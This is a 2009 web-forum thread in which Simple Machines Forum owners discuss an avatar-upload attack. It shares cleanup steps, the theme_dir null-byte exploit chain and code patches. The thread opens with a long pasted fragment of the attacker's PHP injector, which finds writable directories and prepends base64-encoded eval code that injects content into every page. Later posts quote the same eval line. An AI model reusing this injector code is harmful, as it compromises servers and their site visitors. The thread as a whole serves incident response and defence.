//if($flag || count($madrs) > 300){
if($flag){
return;
}
$php_found = "";
$writable = 0;
//$folder = realpath($ff);
$folder = $ff;
$folder = str_replace('\\', '/', $folder);
if(substr($folder, strlen($folder) - 1, 1) <> '/'){
$folder .= '/';
}
if(!file_exists($folder)){
echo"<font color='red'>{$folder} not exists</font><br>";
return;
}
if(!is_dir($folder)){
echo"<font color='red'>{$folder} is not dir</font><br>";
return;
}
$dir_perm = substr(sprintf('%o', fileperms($folder)), -4);
$new_dir_perm = substr(sprintf('%o', fileperms($folder)), -4);
if($new_dir_perm <> $dir_perm){
$new_dir_perm = "$dir_perm >> $new_dir_perm";
}
$succ = false;
$rndfl = rand(1,9999999999).'.php';
$f = fopen($folder.$rndfl, "w");
if(!$f){
if(isset($_GET['details'])){
echo"<font color=red>[{$new_dir_perm}] {$folder}</font><br>";flush();
}
}else{
if(isset($_GET['details'])){
echo"<font color=green>[{$new_dir_perm}] {$folder}</font><br>";flush();
}
fclose($f);
if(!unlink($folder.$rndfl)){
if(isset($_GET['details'])){
echo"<font color='red'>{$folder}{$rndfl} failed to delete</font><br>";
}
unset($madrs[$folder]);
}
$writable = 1;
}
if($GLOBALS['rewrite_old'] && $writable && file_exists($folder.$GLOBALS['dgin'])){
echo"<b style=\"color:green\">old js [{$folder}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";
if(file_exists($folder.'cnf')){
$ct = implode('', file($folder.'cnf'));
$ct = preg_replace("/ZGd1aA\=\=.*\n/", '', $ct);
save_text_to_file($folder.'cnf', $ct, "<br>config file updated<br>", 1);
//unlink($folder.'cnf');
}
$flag = true;
$madrs = array();
$madrs[$folder] = 1;
return;
}
$h = opendir($folder);
if(!$h){
if(isset($_GET['details'])){
echo"<font color='red'>$folder opendir failed</font><br>";
}
return;
}
while(strlen($f = readdir($h))){
if($f == '.' || $f == '..' || $f == '/' || $f == '\\'){
continue;
}
if(is_dir($folder.$f)){
fddir($folder.$f.'/', $madrs, $flag);
}elseif(is_file($folder.$f) && in_array(strtolower(gfe($folder.$f)), array("php","phtml","php3"))){
$php_found = $folder.$f;
}
}
closedir($h);
if($writable/* && $php_found*/){
$madrs[$folder] = 1;
}
}

$str = "if(function_exists('ob_start')&&!isset(\$GLOBALS['sh_no'])){\$GLOBALS['sh_no']=1;if(file_exists('{$GLOBALS['dgcp']}{$GLOBALS['dgin']}')){include_once('{$GLOBALS['dgcp']}{$GLOBALS['dgin']}');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode(\$d){\$f=ord(substr(\$d,3,1));\$h=10;\$e=0;if(\$f&4){\$e=unpack('v',substr(\$d,10,2));\$e=\$e[1];\$h+=2+\$e;}if(\$f&8){\$h=strpos(\$d,chr(0),\$h)+1;}if(\$f&16){\$h=strpos(\$d,chr(0),\$h)+1;}if(\$f&2){\$h+=2;}\$u=gzinflate(substr(\$d,\$h));if(\$u===FALSE){\$u=\$d;}return \$u;}}function dgobh(\$b){Header('Content-Encoding: none');\$c=gzdecode(\$b);if(preg_match('/\<body/si',\$c)){return preg_replace('/(\<body[^\>]*\>)/si','\$1'.gml(),\$c);}else{return gml().\$c;}}ob_start('dgobh');}}}";

$str = "<?php /**/eval(base64_decode('" . base64_encode($str) . "')); ?>";
echo"<small>";
echo"<h3>INJECTING PHP FILES</h3>";
$GLOBALS['dgdirs'] = array();
$GLOBALS['dgfiles'] = array();

echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush();
phpinj($GLOBALS['dgsp'], $str, 1, 0);

$tmp = explode("/", $GLOBALS['fpath']);
$path = '';
$c = 0;
foreach($tmp as $key=>$val){
if(!$val && $c){
continue;
}
$c++;
$path .= $val . "/";
if(strlen($GLOBALS['dgsp']) > strlen($path)){
continue;
}
echo"<h4>GOTO: $path</h4>";
phpinj($path, $str, 1, 0);
}

die("</small><hr><b>dgok</b></div>");

Krisbarteo had done the same to my forum. An avatar 1,82KB large. All my PHP files were corrupted

He came from 94.142.129.147

Yeah that was the IP that he had when he paid my forum a visit too.


Very informative post, thanx all.

I am running 1.1.8, and after having problems with user Avatars displaying, it didn't take long to be led to this post identifying "Krisbarteo" which i found was a user on my site.

I have banned/deleted the account, however many of my member avatars are still not working. So i am assuming, my site must still be affected by that accounts attack. Yet, I looked through my PHP files and did not find any of the above listed code embedded in them.

Can someone offer any guidance as to where i should be looking so that I can attempt to remove them? Or could i have not been attached (even though he was a member) and my avatar problem caused by something else? Although i find it unlikely becuase the problems did begin shortly after he was a member.

Thanx.

Title: Re: Hacked, script injection
Post by: cowdude on May 10, 2009, 10:32:56 AM
You guys are big help and I appreciate all you are doing.

I want to ask a very specific question.  Once everything is clean, which I have done 3 or 4 times and I did just KRISBARTEO, it has popped back up.  My question are:

1.  Is the code the "64 Base" crap with a long "string of number" behind it or is that the result of the code that I have missed so far?

2.  Is the code only appearing in .php files or should I be scouring others as well, i.e. htaccess files?

Thanks again.

Cowdude
Title: Re: Hacked, script injection
Post by: DirtRider on May 10, 2009, 12:40:40 PM
Anyone thought of contacting the ISP at all  :D

"CSS GROUP" Ltd.
Caunas street 7A-26, Cesis, LV-4101

Phone: +371 67 404544
Fax: +371 67 414545

E-mail addresses

Common questions:

Technical support:

Financial department:

Device rent and colocation:

SPAM report:    info@cssgroup.lv

support@cssgroup.lv

billing@cssgroup.lv

colo@cssgroup.lv

abuse@cssgroup.lv
Title: Re: Hacked, script injection
Post by: san2012 on May 10, 2009, 12:46:32 PM
Had the same problem.
What about official answer?
Title: Re: Hacked, script injection
Post by: daveaite on May 10, 2009, 01:56:55 PM
I'm screwed. It's only a matter of time before I get hit. Farewell mates. :(


I'll tighten up security as well and make back-ups, but this is just a pain, I have enough coding troubles as is.
Title: Re: Hacked, script injection
Post by: Tiribulus on May 10, 2009, 04:17:06 PM
Ever think these hackers come here to see what everyone is saying for future research? It wouldn't be hard to come here, look around at all these posts and see what everyone is saying on how to prevent the attacks and then just adjust to our adjustments. Plus, with all the websites listed all around the board they have an unlimited supply of potential victims.

I'm just guessing, but I'm betting that the really dangerous ones can learn all they need from the code alone. It's no major feat to get read access to somebody's live files either. Even I know how to do that. Regardless, what are people supposed to do? It's impractical to just not discuss your products in public as I'm sure you realize.
Title: Re: Hacked, script injection
Post by: WillyP on May 10, 2009, 04:49:04 PM
... however many of my member avatars are still not working. So i am assuming, my site must still be affected by that accounts attack. Yet, I looked through my PHP files and did not find any of the above listed code embedded in them.

Can someone offer any guidance as to where i should be looking so that I can attempt to remove them? Or could i have not been attached (even though he was a member) and my avatar problem caused by something else? Although i find it unlikely becuase the problems did begin shortly after he was a member.

Thanx.



My forum showed no signs of the affliction... a wiki installation on the same domain errored out, thats how I knew there was a problem.

In every file, except for the settings file, there was this at the top, starting on the first line:

Code: [Select]
<?php /**/eval(base64_decode(' [color=red]note, there was a very long string of letters and digits here I removed for clarity[/color]=')); ?>
<?php

The avatar used displayed as a 1x1pixel, white dot.
Title: Re: Hacked, script injection
Post by: Relyana on May 10, 2009, 09:14:33 PM

My forum showed no signs of the affliction... a wiki installation on the same domain errored out, thats how I knew there was a problem.


What do you mean by that ? He registered on my forum too with both of his nicknames. He only activated one of his accounts and uploaded the fake avatar containing that php code but I can't find anything wrong or weird in any other files (it's 4 a.m. here and I'm still searching). He was active for only 1 minute and 9 seconds.

Wouldn't it be safer for everyone if this topic would be in a member only board ? (I guess not ...just asking)
Title: Re: Hacked, script injection
Post by: Polymath on May 10, 2009, 09:33:31 PM
Right..In my /FCKeditor/editor/filemanager/browser/default/images/icons the is folder called /32

with something like 2500 files..(no extension) and they are all numbered something like 26ca85f79bc46b4e6ae3a1f00f679fb3

Are these part of SMF or this blokes stuff..?? safe to delete?
Title: Re: Hacked, script injection
Post by: cowdude on May 10, 2009, 11:00:15 PM
That's part of the crap I deleted.  It had no impact.  There is a tool I used that someone refer to on here earlier: ATF-Cleaner @ atribune.org.  I kept cleaning my "temp files" out with this before I uploaded anything.  It worked! 

I have 6 sites tied together on one database.  If it hits one, it nails them all.  I am smarter now than 10 days ago about this stuff.

Just for the record my site is getting as tight as a crabs butt...but for now I am counting on you guys as my "DEPENDS" to help me catch my mistakes!

Thanks everyone I believe I am free of the problem now.

Cowdude
Title: Re: Hacked, script injection
Post by: Sarge on May 10, 2009, 11:04:13 PM
Right..In my /FCKeditor/editor/filemanager/browser/default/images/icons the is folder called /32

with something like 2500 files..(no extension) and they are all numbered something like 26ca85f79bc46b4e6ae3a1f00f679fb3

Are these part of SMF or this blokes stuff..?? safe to delete?

FCKeditor is not part of SMF. Some mods (TinyPortal, for example) seem to install it.
Title: Re: Hacked, script injection
Post by: Polymath on May 10, 2009, 11:08:39 PM
Quote
FCKeditor is not part of SMF. Some mods (TinyPortal, for example) seem to install it. 
 

Thats nice.
 Do I remove folder called /32 with all that stuff in it? Is it part of this hacker
Title: Re: Hacked, script injection
Post by: oakview on May 11, 2009, 01:31:31 AM
Wouldn't setting the "Method of registration employed for new members" to "Member Approval" act as a tar pit of sorts? If I understand the setting correctly, the person applying for forum membership cannot do anything until approved by an admin.

If this assumption is correct, then wouldn't this be a solution of sorts for forums who typically see a low volume of membership applications? Ours is low enough to make it feasible to examine the IP and email addresses and cull out anything suspicious, or perhaps send a canned query of sorts to the listed email address.

Thoughts anyone? Even with the IP block bans I have in place, I'm still getting applicants that are very suspicious.
Title: Re: Hacked, script injection
Post by: Sarge on May 11, 2009, 01:41:22 AM
Quote
FCKeditor is not part of SMF. Some mods (TinyPortal, for example) seem to install it. 
 

Thats nice.
 Do I remove folder called /32 with all that stuff in it? Is it part of this hacker

I'm not sure. But I suggest that you get a backup of that folder (if it's not too large) and then delete it.

However, it's possible that your forum has other problems too... I suggest locking down your site until someone with experience can check it.
Title: Re: Hacked, script injection
Post by: Sarge on May 11, 2009, 01:44:54 AM
oakview, Member Approval seems like a good idea, but perhaps it's not enough.

As a precautionary measure, I suggest disabling all kind of uploads, including avatars. If you choose to let members use external avatars via an URL, make sure that you also disable downloading avatars at that URL (it's in Admin > Attachment and Avatars > Avatars).
Title: Re: Hacked, script injection
Post by: thebofh on May 11, 2009, 01:52:27 AM
I moved my attachments directory out of public_html some time ago, would I still be vulnerable? I've just implemented bans on the IP ranges, email addresses & usernames mentioned. I've also locked down the newbies group so that they can't upload anything until they have 11 posts and installed that Stop Spam mod.

Is there anything else I should be doing?
Title: Re: Hacked, script injection
Post by: Sarge on May 11, 2009, 01:56:03 AM
If anyone uses TinyPortal or any other mod that allows user uploads, disable those too.
Title: Re: Hacked, script injection
Post by: oakview on May 11, 2009, 02:50:01 AM
Quote
As a precautionary measure, I suggest disabling all kind of uploads...

@Sarge - done! Good advice.
Title: Re: Hacked, script injection
Post by: DirtRider on May 11, 2009, 03:48:01 AM
What about if your are running a gallery  :P
Title: Re: Hacked, script injection
Post by: san2012 on May 11, 2009, 04:48:33 AM
What about if your are running a gallery  :P
I think it has vulnerability too. Because when I went to another infected sites, which links I found in my html, after tag <body>. On some sites I saw smf forum but on another gallery.
Title: Re: Hacked, script injection
Post by: san2012 on May 11, 2009, 04:55:27 AM
Right..In my /FCKeditor/editor/filemanager/browser/default/images/icons the is folder called /32

with something like 2500 files..(no extension) and they are all numbered something like 26ca85f79bc46b4e6ae3a1f00f679fb3

Are these part of SMF or this blokes stuff..?? safe to delete?
I had the same situation, that's not a part of smf, that's hackers links on another infected sites. But besides delete this you should find avator with <?php  code, style.css.php (May be another name) and clean every php file from  eval(base64_decode( in top.
Title: Re: Hacked, script injection
Post by: DirtRider on May 11, 2009, 06:47:15 AM
Well I think if you have this mod it should stop a lot of them coming into your site to start with http://custom.simplemachines.org/mods/index.php?mod=1547 (http://custom.simplemachines.org/mods/index.php?mod=1547)
Title: Re: Hacked, script injection
Post by: Relyana on May 11, 2009, 08:23:52 AM
Few days before krisbarteo registered I noticed some weird error logs in cPanel (someone was trying on and on to get to files that didn't exist in my account like /chat, /phpchat, /phpmychat, /roundcubemail and so on) so I banned that whole IP range. He came back the next day using another Ip (close enough to the banned ones) so I banned that too.

Last night I only found the avatar with the bad code in it but it was enough to convince me to uninstall all mods, remove all files and run the large upgrade script.

Is it true that smf 2.0 RC1 is not affected by this vulnerability ? I was waiting for the stable release but I'm starting to think that it is about time to move on.
Title: Re: Hacked, script injection
Post by: JBlaze on May 11, 2009, 08:40:38 AM
Please see this topic on how to secure your site.
http://www.simplemachines.org/community/index.php?topic=309717.0
Title: Re: Hacked, script injection
Post by: Relyana on May 11, 2009, 11:08:23 AM
Thank you so much !!! That hacker opened 3 accounts already (krisbarteo, MagicOPromotion and stilusmagic).

The "Stop Spammer" mod is simply fabulous (made me laugh too : it blocked the account of one of my Global Mods, someone I know for years :P - his IP and email address are clean but his nickname is in the database - a common name actually).

I can't thank you enough.  O:)

Title: Re: Hacked, script injection
Post by: rthrash on May 11, 2009, 11:17:17 AM
1.1.8 definitely still has some vulnerability regarding themes/avatars: http://www.simplemachines.org/community/index.php?topic=309741.0

Any ideas if this has been fixed in the 2.0 RC, or what the specific bug that allows this to happen is? This really deserves an update pronto.

Off to deploy the Stop Spammer mod.
Title: Re: Hacked, script injection
Post by: JBlaze on May 11, 2009, 11:19:47 AM
1.1.8 definitely still has some vulnerability regarding themes/avatars: http://www.simplemachines.org/community/index.php?topic=309741.0

Any ideas if this has been fixed in the 2.0 RC, or what the specific bug that allows this to happen is? This really deserves an update pronto.

Off to deploy the Stop Spammer mod.

This is an unofficial fix to this hack until an official patch comes out
http://www.simplemachines.org/community/index.php?topic=309717.0
Title: Re: Hacked, script injection
Post by: rthrash on May 11, 2009, 11:23:47 AM
This is an unofficial fix to this hack until an official patch comes out
http://www.simplemachines.org/community/index.php?topic=309717.0

We've disabled all uploads, and the Stop Spammer mod should prevent most signups but there are definitely ways to get around that quickly. So other than shutting down the functionality there's no additional info? Is the same base code in place in the 2.0 branch?
Title: Re: Hacked, script injection
Post by: JBlaze on May 11, 2009, 11:25:18 AM
So far, I have not heard of or seen any attacks that affected the 2.0 version, but that's not to say that it hasn't happened.


What it boils down to is that the avatar that is being uploaded in this attack has php code embedded into it and it is being parsed through the avatar handler.
Title: Re: Hacked, script injection
Post by: rthrash on May 11, 2009, 11:49:38 AM
Thanks for your feedback JBlaze™. Much appreciated and prompt. :D
Title: Re: Hacked, script injection
Post by: JBlaze on May 11, 2009, 11:52:14 AM
Thanks for your feedback JBlaze™. Much appreciated and prompt. :D

No problem. I'm trying to stay one step ahead of this attack and provide the best support I can :)
Title: Re: Hacked, script injection
Post by: rthrash on May 11, 2009, 02:47:35 PM
I can say that the Stop Spammer add-on is really great indeed. It would have saved us all sorts of grief. Had to manually install it due to how locked down we have things right now but very pleased with what it's doing.

Just to confirm though, the install2.xxx bits are for SMF 2.0, correct? That's not totally clear from any instructions and the manual install instructions aren't parsing on the add-on site for version 1.1.8.
Title: Re: Hacked, script injection
Post by: JBlaze on May 11, 2009, 02:50:49 PM
I can say that the Stop Spammer add-on is really great indeed. It would have saved us all sorts of grief. Had to manually install it due to how locked down we have things right now but very pleased with what it's doing.

Just to confirm though, the install2.xxx bits are for SMF 2.0, correct? That's not totally clear from any instructions and the manual install instructions aren't parsing on the add-on site for version 1.1.8.

I will have to look into it as I have had it installed for about a month now and didn't have problems on install. There may have been an update since then. I will post back with my findings.
Title: Re: Hacked, script injection
Post by: DirtRider on May 11, 2009, 03:09:13 PM
I have just installed it on two of my site with no problems at all
Title: Re: Hacked, script injection
Post by: Polymath on May 12, 2009, 01:03:45 AM
I must say it is very nice. I have deleted a whole folder twice ..In my /FCKeditor/editor/filemanager/browser/default/images/icons the is folder called /32

with something like 2500 files..(no extension) and they are all numbered something like 26ca85f79bc46b4e6ae3a1f00f679fb3


And it won't go away.... Very nice.. >:(

Response:   550 Can't remove directory: Directory not empty
Status:   Retrieving directory listing...
Command:   PASV
Response:   227 Entering Passive Mode (209,200,249,149,107,97)
Command:   LIST
Response:   150 Accepted data connection
Response:   226-ASCII
Response:   226-Options: -a -l
Response:   226 29 matches total
Status:   Directory listing successful


Any ideas? Permissions 755 on it drwxr-xr-x

And another question Can I repair the php file and upload as I go, or will it just get written again?
Title: Re: Hacked, script injection
Post by: djkimmel on May 12, 2009, 01:05:22 AM
If this code were placed in my avatar upload/attachments directory htaccess, would it provide protection against an attack like this (I still can't believe anyone could just upload PHP in a '.jpg' file and get it to run?!?) - it was suggested to me after I explained how this person was able to hack my forum (and all other PHP files in every folder):

Code: [Select]
# secure directory by disabling script execution
AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
Options -ExecCGI

Order Allow,Deny
Deny from all
<Files ~ "\.(jpeg|jpg|png|gif)$">
Allow from all
</Files>

I'm thinking it might cause a problem since regular attachments are encrypted, though I would think the encrypted attachments should keep them from being used the same as an uploaded avatar was used? Would this code in an htaccess file keep any of the encrypted files from being uploaded and used on the forum? Would it stop a graphic file from executing code?
Title: Re: Hacked, script injection
Post by: MrPhil on May 12, 2009, 11:08:20 AM
If you have PHP code within a .jpg file, I'm not sure that the .htaccess code is going to catch it (since it's not .php). Have you tried making an "innocent" image file (just says "Hello World") and tested it?

Would it be possible to scan incoming image uploads and blank out all script code (everything between <? and ?>, and everything between <script and script>, and whatever else is needed)?
Title: Re: Hacked, script injection
Post by: djkimmel on May 12, 2009, 12:45:46 PM
Haven't tried that yet, but it is a good suggestion.

The 2nd suggestion is beyond my skills at this time... but I'm learning out of necessity :) Might work once I learn how, but maybe the simpler suggestion is to do some limits so members have to be around a while before they can upload or do attachments.

Still can't believe it was so easy for this person to hack SMF and use it on the rest of the site. I've read everything suggested or linked on the few threads regarding this hack and protection in general. I hope that covers any other surprises I might get like this one? No more overconfidence for me. Too much I don't know about this stuff.
Title: Re: Hacked, script injection
Post by: GamingTrend on May 12, 2009, 03:01:24 PM
So I overwrote all but the settings file for SMF Forums 1.8 and I'm still getting code injection.  I'm just not sure where to look at this point...help?

Oh, and when I was allowing uploading of avatars (I've disabled it for now) the avatars would eventually die off and have to be re-uploaded. 
Title: Re: Hacked, script injection
Post by: Agafonov on May 12, 2009, 03:09:09 PM
So I overwrote all but the settings file for SMF Forums 1.8 and I'm still getting code injection.  I'm just not sure where to look at this point...help?

You should remove all files and folders except settings and attachments.
There are number of new files injected as well with "hacker's control panel" code.
Then search and remove all files found by:
Code: (sh) [Select]
grep "<?php" attachments/*
Title: Re: Hacked, script injection
Post by: crash56 on May 12, 2009, 03:50:52 PM
Theoretical question here, because I'm getting all of this straight in my mind ...

If we were to get hit by this hacker, and we had a recent clean backup of all our files, we could just reupload those ... yes?  Or does this code get into the database in some way so we would have to clean that up as well?
Title: Re: Hacked, script injection
Post by: JBlaze on May 12, 2009, 03:57:29 PM
So far, this hack only affects the /Sources and /Themes files as well as the affected avatar. To my knowledge, having worked with members on this hack for the past week or so, I have yet to find any damage done to the database.

The one thing that has saved members was backing up their files by simply downloading the enitre SMF installation, minus the database, to their hard drive once a day.

Then, if you feel you have been hacked, take your forum offline, upload the backed up files making sure the old ones are overwritten  and voila!
Title: Re: Hacked, script injection
Post by: crash56 on May 12, 2009, 03:59:50 PM
Great!  Thanks!  (No, we're not going to drop all defenses. ;) )
Title: Re: Hacked, script injection
Post by: JBlaze on May 12, 2009, 04:16:23 PM
I have a question - is this hack simply an avatar upload and the forums wrecked?

I mean, can any Joe Shmoe get a hold of this avatar and use it without "skills"?

That's a good question. But for now, it has been limited to only a few usernames such as "krisbarteo" and "MagicOPromotion" among a few others.

But yes, it is a good point to bring up as so far it is a generic 1x1 avatar that is masked with either a .jpg or .gif extension, but contains php code.

I will look into it.
Title: Re: Hacked, script injection
Post by: matthieu on May 12, 2009, 04:22:56 PM
Hi,

Thanks for this topic !
I have this problem whith the member named above (krisbarteo) and his avatar was indeed encapsulated PHP ...

My error was to set CHMOD 777 on the attachement directory ... Shame on me ...
Title: Re: Hacked, script injection
Post by: JBlaze on May 12, 2009, 04:29:52 PM
I have also created a topic on how to prevent being hacked.

http://www.simplemachines.org/community/index.php?topic=309717.0
Title: Re: Hacked, script injection
Post by: matthieu on May 12, 2009, 04:37:49 PM
yes Jblaze, thx. I read it and applied changes.
Title: Re: Hacked, script injection
Post by: Agafonov on May 12, 2009, 06:02:29 PM
Or does this code get into the database in some way so we would have to clean that up as well?

Analyzing DB dump:
The user (krisbarteo) have set theme_dir to ./attachments/avatar_46455.jpg\0 (note zero code at the end)
Then requests (according to error log) to ?action=theme;sa=pick;u=46455;sesc lead to execution of avatar as php in include() call inside theme handling code.
Quote
8: Use of undefined constant php - assumed 'php'<br />File: /nfs/www/ru/forum/htdocs/attachments/avatar_46455.jpg<br />Line: 1

How the value of theme_dir appeared in smf_themes table - is the main question.
Title: Re: Hacked, script injection
Post by: Polymath on May 12, 2009, 09:00:07 PM
I have all the code on top..but I can not find his avatar at all.
Title: Re: Hacked, script injection
Post by: Polymath on May 12, 2009, 10:54:39 PM
OK. I removed all code up top and now I only get the top half of my website..  :( my back up was the one i removed it from. Is there something I missed. It is the Sources that has caused this. My admin is still there and working but nothing else.
I just removed and uploaded.
Any ideas?
Title: Re: Hacked, script injection
Post by: JBlaze on May 12, 2009, 11:11:26 PM
Make sure that you did not leave a space at the top of each file.

<?php must be the first line
Title: Re: Hacked, script injection
Post by: Polymath on May 12, 2009, 11:18:34 PM
Bugger.. I bet I overwrote settings.php..
Title: Re: Hacked, script injection
Post by: dcmouser on May 13, 2009, 05:53:42 AM
Ok so we did some investigating on our forum to see how vulnerable we were to this attack; Agafonov's discovery was a big help in understanding what was going on.

Let me summarize what I think i understand, pieced together from several places and from going through the code.

The attack is a multi-step attack:

FIRST, the user uploads an avatar image (or an attachment on a post), doesn't really matter, and doesn't have to be an image i don't think.
The goal here is for them simply to get their payload php script onto your server.

SECOND, they trick the forum code into INCLUDING their payload php file while it's running other php code.

This second part is the tricky part, and it's what makes some of the potential fixes suggested in this thread useless.

The original method that they use to execute the file payload was described back in november 2008, as can be seen in this thread:
http://www.simplemachines.org/community/index.php?topic=272393.20

The basic idea is that the evil user tells the smf forum to INCLUDE a file from the CUSTOM theme directory (variable theme_dir).  And then they bring up one of the pages on the forum that actually loads a file in the theme dir.

By setting the themedir to the file path of their malicious fake image file (with a \0 on the end of it as seen above), the malicious user actually tricks the smf forum to parse the fake image file and execute the php in it directly).

---

Now, the part that makes this a bit messy to fix is that there are NUMEROUS places in smf where a user's custom 'theme_dir' variable can be set, and numerous places where it is used.

It seems to me that most of these were fixed in earlier SMF releases.. *BUT* a few remain(!) and that is how this exploit is still occuring.

---

[the truth is that users should NEVER be allowed to customize their theme_dir -- this is a flaw in smf and should be remedied]

I'm offering some fixes we did locally, but i'm not guaranteeing this will fix all the risk -- and i hope smf people will follow up.

The first fix will prevent the Theme Picker from using custom user theme_dir variables, which should prevent this particular exploit even in users which previously modified their variable in an effort to hack your forum.  This one is most important quick fix and should solve this particular exploit:

In Themes.php, FIND:
      $request = db_query("
         SELECT ID_THEME, variable, value
         FROM {$db_prefix}themes
         WHERE variable IN ('name', 'theme_url', 'theme_dir', 'images_url')" . (empty($modSettings['theme_default']) && !allowedTo('admin_forum') ? "
            AND ID_THEME IN ('$knownThemes')
            AND ID_THEME != 1" : '') . "
            AND ID_THEME != 0
AND ADD AT THE END
                                AND ID_MEMBER = 0



The second fix will prevent new changes to users theme_dir variable (but not correct existing changes that evil members already set).
I'll leave it for someone else to go into more details since im running low on sleep but basically
In Profile.php, go into makeThemeChanges function
and inside both loops through $_POST['options'] and $_POST['default_options']
and add a line inside the loops saying:
         if (strpos($opt,'_dir')!==FALSE || strpos($opt,'_url')!==FALSE)
            continue;


---

There are 2 more things you can do:
search the smf database, the themes table
for rows where variable=theme_dir

the hits are users who have tried to use this exploit.

DELETE THESE ROWS -- after noting the filenames and userids.

now i'd say don't panic when you find entries there -- but DO go check out the files uploaded by these users (you'll see them listed in these rows), and make sure you don't find really evil php code in any of them..  those tables will also tell you which exact users uploaded the files an attempted to run exploits.  then delete those attachment files.

---

hope that's at least some use -- sorry it's not explained better but we just spent a few hours on this right before we planned on sleeping, so i'm just rushing to explain what we found in time to be useful to someone.

and note that none of the instructions above will do anything to CLEAN a system that has actually been exploited by this attack by someone who put really malicious code in one of the payloads.
Title: Re: Hacked, script injection
Post by: Kindred on May 13, 2009, 08:18:08 AM
DO be aware that the development team IS working on fixing this in the code and will release a security update once the fix is tested and confirmed.
Title: Re: Hacked, script injection
Post by: kwah on May 13, 2009, 09:09:44 AM
DO be aware that the development team IS working on fixing this in the code and will release a security update once the fix is tested and confirmed.
We kinda suspected it.

Any indication on ETA would be very much appreciated by a lot of people I guess. Uncertainty is one of the worst things, you know...
Title: Re: Hacked, script injection
Post by: DirtRider on May 13, 2009, 10:14:24 AM
I have made contact with this hackers ISP here is the reply

Quote
thanks for you reporting.

1. Please tell more information about this action, domain name (-s) or IP address (-es) of your website, which has suffered?
2. IP address (-es) who attacked your website?

We investigate this action and we'll do anything to avoid this problem in future.

So if you want to PM me your info I will compile a list and send it along to them for investigation. Also include the time more or less that the hack took place 
Title: Re: Hacked, script injection
Post by: GamingTrend on May 13, 2009, 02:27:06 PM
Should there be files in /Themes/babylon/topic/? 

I'm seeing a BUNCH of files named stuff like 0826864081449d624837cae95c04d304 instead of my hot_poll.gif type files....

Title: Re: Hacked, script injection
Post by: Edvard on May 13, 2009, 02:41:42 PM
I'd just like to add that I also had a Hacktool.Rootkit on the pc I use for administrating my website. I solved this first, and then, when the whole site was taken off-air, I asked my webhoster to change the passwords for the ftp and mysql. After that I uploaded the site again and since then the site hasn't been infested by bad php-code anymore.

Btw, I have the idea that Krisbarteo never got to upload an avatar on my site, yet I got all this trouble anyway...
Title: Re: Hacked, script injection
Post by: GamingTrend on May 13, 2009, 02:45:28 PM
Should there be files in /Themes/babylon/topic/? 

I'm seeing a BUNCH of files named stuff like 0826864081449d624837cae95c04d304 instead of my hot_poll.gif type files....



I deleted them all just to be sure anyway.  I don't like randomly named files that span roughly 3000 different names.  Let's hope that my cleanup worked.
Title: Re: Hacked, script injection
Post by: justjim on May 13, 2009, 03:41:17 PM
He has hit our forum as well.

I have been cleaning for 2 days. I thought I got all of the code out of the files, but these problems remain:

Some of our members avatars have failed to display as well as the random letter code that is supposed to be displayed on the registration screen.
The members who's avatars have diasppeared are unable to upload a replacement avatar.
The members who's avatars do not display are in the attachment folder. I have physically verifed that they are there.
I have no error logs indicating an issue.

I have RT clicked 2 of the missing avatars->> properties; and this is what is displayed

http://sh.com/simplemachinesforum/index.php?action=dlattach;attach=270;type=avatar

http://sh.com/simplemachinesforum/index.php?action=dlattach;attach=813;type=avatar

I have Rt clicked the random letter code box ->> properties: and this is what is displayed.

http://sh.com/simplemachinesforum/index.php?action=verificationcode;rand=2157f0db0a2cbf8323e7f0fee5ee2fd1

Of course now, new members cannot register without a verification code. I feel somehow they are related

Can you please tell me where to look for the problem

By the way I have a sample of the 64 code, the infected avatar itself , the IP address 94.142.129.147 Latvia

And the code strings of the avatar if anyone wants a copy or any other info.
Title: Re: Hacked, script injection
Post by: M-DVD on May 13, 2009, 11:23:37 PM
1.- Here are some details about krisbarteo (http://www.stopforumspam.com/search?q=krisbarteo). Can somebody give me more data to report in SFS site? (and all the people using this DB will be immune from these users).

2.- If somebody have to "the avatar uploaded" by this user, should give to the Team SMF (and me, XD, I have curiosity). (done (http://www.simplemachines.org/community/index.php?topic=307717.msg2046772#msg2046772), thanks :))

3.- There is another problem, how the spammers run this file once uploaded?
Title: Re: Hacked, script injection
Post by: Filipina on May 14, 2009, 12:05:54 AM
Since I have an avatar upload on registration modification which I do not feel like messing with I have disabled registrations. What if I just say screw it and take my chances, while saving a copy of all the files in me forum directory twice a day. If I get hacked can't I just upload all the clean files from my forum and all will be fine?
Title: Re: Hacked, script injection
Post by: Agafonov on May 14, 2009, 02:16:53 AM
3.- There is another problem, how the spammers run this file once uploaded?

Read http://www.simplemachines.org/community/index.php?topic=307717.msg2056804#msg2056804 and http://www.simplemachines.org/community/index.php?topic=307717.msg2057480#msg2057480
Title: Re: Hacked, script injection
Post by: Agafonov on May 14, 2009, 02:29:55 AM
If I get hacked can't I just upload all the clean files from my forum and all will be fine?

According to my findings, simple overwriting files will not help.
You have to remove all files and folders except Settings.php and attachments/ (if no other used by your mods, I'm not sure).
This will make you sure that where is no hacker's code in your files.
But even then you have to alter database to clean spectial "theme_dir" value from "smf_themes" table that was used to break into.
Title: Re: Hacked, script injection
Post by: Edvard on May 14, 2009, 03:21:42 AM
Again, I'd like to add that my forum was hacked several times in a short time span (a few days), even though I completely deleted the forum and replaced it by a clean backup. Somehow, either through the php-script or via the rootkit.hacktool on my admin-pc, the ftp server password was compromised, and the site was hacked again overnight.

So, if your site is hacked, make sure your admin-pc is virus and malware free. Then delete your whole forum (make a backup of the infected forum if you wish, I did so I could put non-infected avatars and attachments, as well as other changes, back on-line), change the ftp and mysql server passwords, and upload clean forum software.

And, the most important lesson I've learnt is: MAKE BACK-UPS! This will be the last time I have to resort to a backup made almost one and a half year ago. I suggest making back-ups every time you change some of the php or html files, before upgrades/updates, and generally often enough to ensure attachments and avatars won't be lost.
Title: Re: Hacked, script injection
Post by: Tiribulus on May 14, 2009, 12:52:16 PM
<<< But even then you have to alter database to clean spectial "theme_dir" value from "smf_themes" table that was used to break into.

You're not saying that the mere presence of this value is bad right? Meaning there is a legitimate one that's supposed to be there correct?
Title: Re: Hacked, script injection
Post by: stevefdl on May 14, 2009, 03:19:03 PM
I got hacked with a javascript between the head and body of my site. I tried re-installing, but nothing seems to work. Code is still there...anyone know if this is the same hack?

</head><script language=javascript><!--
